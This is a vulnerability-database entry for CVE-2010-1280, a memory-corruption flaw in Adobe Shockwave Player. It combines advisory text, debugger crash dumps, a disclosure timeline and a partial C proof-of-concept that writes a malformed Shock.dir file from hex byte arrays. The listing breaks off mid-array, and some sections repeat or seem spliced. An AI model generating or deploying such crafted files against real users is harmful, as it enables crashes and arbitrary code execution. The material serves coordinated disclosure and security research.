Sign-up

ID

VAR-201005-0100


CVE

CVE-2010-1280


TITLE

Adobe Shockwave Player Vulnerable to arbitrary code execution

Trust: 0.8

sources: JVNDB: JVNDB-2010-001479

DESCRIPTION

Adobe Shockwave Player before 11.5.7.609 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted .dir (aka Director) file, related to (1) an erroneous dereference and (2) a certain Shock.dir file. Attackers can exploit these issues to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts may cause a denial-of-service condition. Versions prior to Shockwave Player 11.5.7.609 are vulnerable. NOTE: These issues were previously covered in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities); they have been given their own record to better document them. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). Director) file is related to (1) incorrect dereferencing and (2) the Shock.dir file. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers. Tested on: Microsoft Windows XP Professional SP3 (English) Version tested: 11.5.6.606 ==================================================================================================== (f94.ae4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8 eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206 *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - DIRAPI!Ordinal14+0x3b16: 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=???????? ---------------------------------------------------------------------------------------------------- EAX FFFFFFFF ECX 41414141 EDX FFFFFFFF EBX 00000018 ESP 0012F3B4 EBP 02793578 ESI 0012F3C4 EDI 02793578 EIP 69009F1F IML32.69009F1F ==================================================================================================== Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - Macedonian Information Security Research & Development Laboratory http://www.zeroscience.mk 19.09.2009 Zero Science Lab Advisory ID: ZSL-2010-4937 Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php Adobe Advisory ID: APSB10-12 Advisory: http://www.adobe.com/support/security/bulletins/apsb10-12.html CVE ID: CVE-2010-1280 Disclosure timeline: [19.09.2009] Vulnerability discovered. [09.03.2010] Vendor contacted with sent PoC files. [09.03.2010] Vendor replied. [21.03.2010] Asked vendor for confirmation. [21.03.2010] Vendor verifies the weakness. [06.05.2010] Vendor reveals patch release date. [11.05.2010] Coordinated public advisory. */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <stdint.h> #define FFORMAT "Shock.dir" FILE *fp; char shocks[] = { 0x58, 0x46, 0x49, 0x52, 0x2C, 0x23, 0x00, 0x00, 0x33, 0x39, 0x56, 0x4D, 0x70, 0x61, 0x6D, 0x69, 0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x82, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x61, 0x6D, 0x6D, 0x38, 0x03, 0x00, 0x00, 0x18, 0x00, 0x14, 0x00, 0x28, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x17, 0x00, 0x00, 0x00, 0x58, 0x46, 0x49, 0x52, 0x2C, 0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x61, 0x6D, 0x69, 0x18, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x88, 0x8F, 0xE2, 0x0B, 0x70, 0x61, 0x6D, 0x6D, 0x38, 0x03, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE4, 0x6A, 0xE2, 0x0B, 0x2A, 0x59, 0x45, 0x4B, 0x74, 0x01, 0x00, 0x00, 0x6C, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x74, 0x53, 0x41, 0x43, 0x93, 0x00, 0x00, 0x00, 0xE4, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x53, 0x41, 0x43, 0x04, 0x00, 0x00, 0x00, 0xD8, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x6C, 0x00, 0x00, 0x00, 0x80, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00, 0x86, 0x20, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00, 0x7E, 0x20, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00 //252 }; char shocke[] = { 0x66, 0x6E, 0x69, 0x43, 0x3C, 0x00, 0x00, 0x00, 0x94, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6D, 0x61, 0x6E, 0x4C, 0x81, 0x03, 0x00, 0x00, 0xF4, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0xC2, 0x00, 0x00, 0x00, 0x6A, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x43, 0x52, 0x44, 0x64, 0x00, 0x00, 0x00, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x6D, 0x58, 0x46, 0xEE, 0x0E, 0x00, 0x00, 0x74, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x73, 0x43, 0x4D, 0x3A, 0x00, 0x00, 0x00, 0xF6, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x72, 0x6F, 0x53, 0x18, 0x00, 0x00, 0x00, 0x54, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0x46, 0x57, 0x56, 0xA8, 0x00, 0x00, 0x00, 0x8E, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x53, 0x57, 0x56, 0xF8, 0x00, 0x00, 0x00, 0x3E, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00, 0x54, 0x22, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x06, 0x00, 0x00, 0x00, 0x46, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x65, 0x72, 0x66, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x6E, 0x61, 0x68, 0x43, 0x06, 0x00, 0x00, 0x00, 0x5C, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6C, 0x52, 0x54, 0x58, 0x83, 0x04, 0x00, 0x00, 0x6A, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x65, 0x72, 0x66, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00, 0x3E, 0x22, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 0x53, 0x52, 0x45, 0x56, 0x0C, 0x00, 0x00, 0x00, 0x38, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x4F, 0x43, 0x46, 0x38, 0x00, 0x00, 0x00, 0x4C, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x42, 0x55, 0x50, 0x99, 0x01, 0x00, 0x00, 0x8C, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x49, 0x52, 0x47, 0x10, 0x00, 0x00, 0x00, 0x2E, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x46, 0x44, 0x4D, 0x06, 0x00, 0x00, 0x00, 0x46, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x54, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x74, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x59, 0x45, 0x4B, 0x74, 0x01, 0x00, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0x15, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x6E, 0x61, 0x68, 0x43, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x46, 0x43, 0x52, 0x44, 0x1A, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x4F, 0x43, 0x46, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x70, 0x6D, 0x58, 0x46, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x44, 0x49, 0x52, 0x47, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x73, 0x43, 0x4D, 0x1D, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x46, 0x44, 0x4D, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x42, 0x55, 0x50, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x64, 0x72, 0x6F, 0x53, 0x19, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x53, 0x52, 0x45, 0x56, 0x10, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x49, 0x46, 0x57, 0x56, 0x13, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x11, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x43, 0x53, 0x57, 0x56, 0x16, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x6C, 0x52, 0x54, 0x58, 0x1F, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x05, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x2A, 0x53, 0x41, 0x43, 0x09, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x66, 0x6E, 0x69, 0x43, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x08, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x20, 0x6C, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x43, 0x52, 0x44, 0x64, 0x00, 0x00, 0x00, 0x00, 0x64, 0x07, 0x82, 0x00, 0x6C, 0x00, 0x70, 0x02, 0x4C, 0x02, 0xF0, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xFF, 0x00, 0x20, 0xFD, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x82, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x50, 0x00, 0x1E, 0x00, 0x02, 0x0C, 0x3C, 0x00, 0x00, 0x00, 0x3C, 0x3F, 0xD7, 0xE6, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x9B, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x7A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x72, 0x6F, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x14, 0x00, 0x04, 0x00, 0x01, 0x00, 0x01, 0x70, 0x6D, 0x58, 0x46, 0xEE, 0x0E, 0x00, 0x00, 0x3B, 0x20, 0x43, 0x6F, 0x70, 0x79, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x31, 0x39, 0x39, 0x34, 0x2D, 0x32, 0x30, 0x30, 0x38, 0x2C, 0x20, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x20, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x73, 0x20, 0x49, 0x6E, 0x63, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x65, 0x64, 0x2E, 0x20, 0x20, 0x41, 0x6C, 0x6C, 0x20, 0x52, 0x69, 0x67, 0x68, 0x74, 0x73, 0x20, 0x52, 0x65, 0x73, 0x65, 0x72, 0x76, 0x65, 0x64, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x54, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x54, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x70, 0x72, 0x6F, 0x76, 0x69, 0x64, 0x65, 0x73, 0x20, 0x61, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x0D, 0x3B, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x49, 0x66, 0x20, 0x61, 0x20, 0x63, 0x6F, 0x70, 0x79, 0x20, 0x6F, 0x66, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x69, 0x73, 0x20, 0x69, 0x6E, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x61, 0x6D, 0x65, 0x20, 0x66, 0x6F, 0x6C, 0x64, 0x65, 0x72, 0x20, 0x6F, 0x72, 0x20, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x61, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x0D, 0x3B, 0x20, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x2C, 0x20, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x61, 0x75, 0x74, 0x6F, 0x6D, 0x61, 0x74, 0x69, 0x63, 0x61, 0x6C, 0x6C, 0x79, 0x20, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x69, 0x6E, 0x20, 0x65, 0x76, 0x65, 0x72, 0x79, 0x20, 0x6E, 0x65, 0x77, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x2E, 0x0D, 0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x54, 0x6F, 0x20, 0x61, 0x64, 0x64, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x6E, 0x20, 0x65, 0x78, 0x69, 0x73, 0x74, 0x69, 0x6E, 0x67, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x65, 0x2C, 0x20, 0x63, 0x68, 0x6F, 0x6F, 0x73, 0x65, 0x20, 0x0D, 0x3B, 0x20, 0x4D, 0x6F, 0x76, 0x69, 0x65, 0x3A, 0x50, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x74, 0x69, 0x65, 0x73, 0x2E, 0x2E, 0x2E, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x74, 0x68, 0x65, 0x20, 0x4D, 0x6F, 0x64, 0x69, 0x66, 0x79, 0x20, 0x6D, 0x65, 0x6E, 0x75, 0x2E, 0x20, 0x20, 0x54, 0x68, 0x65, 0x6E, 0x20, 0x63, 0x6C, 0x69, 0x63, 0x6B, 0x20, 0x4C, 0x6F, 0x61, 0x64, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x46, 0x69, 0x6C, 0x65, 0x2E, 0x20, 0x20, 0x0D, 0x3B, 0x20, 0x55, 0x73, 0x65, 0x20, 0x74, 0x68, 0x65, 0x20, 0x64, 0x69, 0x61, 0x6C, 0x6F, 0x67, 0x20, 0x62, 0x6F, 0x78, 0x20, 0x74, 0x68, 0x61, 0x74, 0x20, 0x61, 0x70, 0x70, 0x65, 0x61, 0x72, 0x73, 0x20, 0x74, 0x6F, 0x20, 0x6C, 0x6F, 0x63, 0x61, 0x74, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2E, 0x0D, 0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20, 0x49, 0x6E, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x61, 0x20, 0x73, 0x65, 0x6D, 0x69, 0x63, 0x6F, 0x6C, 0x6F, 0x6E, 0x20, 0x61, 0x74, 0x20, 0x74, 0x68, 0x65, 0x20, 0x62, 0x65, 0x67, 0x69, 0x6E, 0x6E, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x66, 0x20, 0x61, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x20, 0x69, 0x6E, 0x64, 0x69, 0x63, 0x61, 0x74, 0x65, 0x73, 0x0D, 0x3B, 0x20, 0x61, 0x20, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x53, 0x70, 0x65, 0x63, 0x69, 0x61, 0x6C, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x4D, 0x61, 0x63, 0x20, 0x4F, 0x53, 0x58, 0x20, 0x75, 0x73, 0x65, 0x72, 0x73, 0x3A, 0x20, 0x54, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x69, 0x73, 0x20, 0x73, 0x61, 0x76, 0x65, 0x64, 0x20, 0x75, 0x73, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x68, 0x65, 0x20, 0x27, 0x43, 0x6C, 0x61, 0x73, 0x73, 0x69, 0x63, 0x27, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x0D, 0x3B, 0x20, 0x65, 0x6E, 0x64, 0x69, 0x6E, 0x67, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x20, 0x28, 0x43, 0x52, 0x29, 0x2E, 0x20, 0x20, 0x49, 0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x6E, 0x65, 0x65, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x6C, 0x74, 0x65, 0x72, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x73, 0x61, 0x76, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x6D, 0x61, 0x6B, 0x65, 0x20, 0x73, 0x75, 0x72, 0x65, 0x20, 0x74, 0x6F, 0x20, 0x0D, 0x3B, 0x20, 0x70, 0x72, 0x65, 0x73, 0x65, 0x72, 0x76, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x2D, 0x20, 0x74, 0x68, 0x65, 0x20, 0x55, 0x4E, 0x49, 0x58, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x20, 0x65, 0x6E, 0x64, 0x69, 0x6E, 0x67, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x20, 0x28, 0x4C, 0x46, 0x29, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x77, 0x6F, 0x72, 0x6B, 0x20, 0x70, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x6C, 0x79, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x46, 0x4F, 0x4E, 0x54, 0x20, 0x4D, 0x41, 0x50, 0x50, 0x49, 0x4E, 0x47, 0x53, 0x20, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x20, 0x77, 0x68, 0x69, 0x63, 0x68, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x20, 0x73, 0x75, 0x62, 0x73, 0x74, 0x69, 0x74, 0x75, 0x74, 